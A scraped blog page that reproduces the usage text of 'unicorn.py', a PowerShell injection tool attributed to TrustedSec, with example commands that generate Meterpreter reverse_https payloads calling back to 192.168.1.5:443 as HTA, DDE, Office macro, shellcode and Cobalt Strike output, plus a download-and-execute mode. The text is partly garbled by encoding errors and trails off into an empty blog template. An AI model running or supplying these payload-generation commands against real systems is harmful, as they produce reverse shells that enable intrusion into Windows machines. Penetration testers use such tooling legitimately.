![]() HTA Example Shellcode: python unicorn.py : shellcode htaĭDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ddeĬustom PS1 Example: python unicorn.py macro 500Ĭobalt Strike Example: python unicorn.py cs (export CS in C# format)Ĭustom Shellcode: python unicorn.py shellcode (formatted 0x00)Įverything is now generated in two files, powershell_attack.txt and unicorn.rc. HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta Macro Example Shellcode: python unicorn.py shellcode macro Macro Example CS: python unicorn.py cs macro Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro PS Down/Exec: python unicorn.py windows/download_exec url= PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 Usage: python unicorn.py payload reverse_ipaddr port Twitter: Matthew Graeber, Justin Elze, Chris Gates Written by: Dave Kennedy at TrustedSec () ![]() Native x86 powershell injection attacks on any Windows platform. AHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |